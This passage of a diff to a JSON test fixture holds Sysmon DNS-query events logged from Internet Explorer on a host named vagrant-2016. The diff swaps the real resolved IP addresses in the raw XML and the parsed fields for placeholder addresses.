03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -2135,7 +2135,7 @@ "event_data": { "QueryName": "idpix.media6degrees.com", "QueryStatus": "0", - "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;", + "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.146", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2160,7 +2160,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2186,7 +2186,7 @@ "ProcessId": "2736", "QueryName": "tpc.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.146" }, @@ -2257,7 +2257,7 @@ { "@timestamp": "2021-05-05T15:30:51.698Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -2278,7 +2278,7 @@ "ProcessId": "2736", "QueryName": "image2.pubmatic.com", "QueryStatus": "0", - "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;" + "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;" }, "process": { "thread": { @@ -2305,7 +2305,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -2325,7 +2325,7 @@ "ProcessId": "2736", "QueryName": "sam.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.183", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -2344,7 +2344,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2370,7 +2370,7 @@ "computer_name": "vagrant-2016", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "event_data": { - "QueryResults": "::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.222", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2386,7 +2386,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2415,7 +2415,7 @@ "ProcessId": "2736", "QueryName": "c1.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;", + "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -2429,7 +2429,7 @@ "event_data": { "QueryName": "urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2457,7 +2457,7 @@ "event": { "provider": "Microsoft-Windows-Sysmon", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 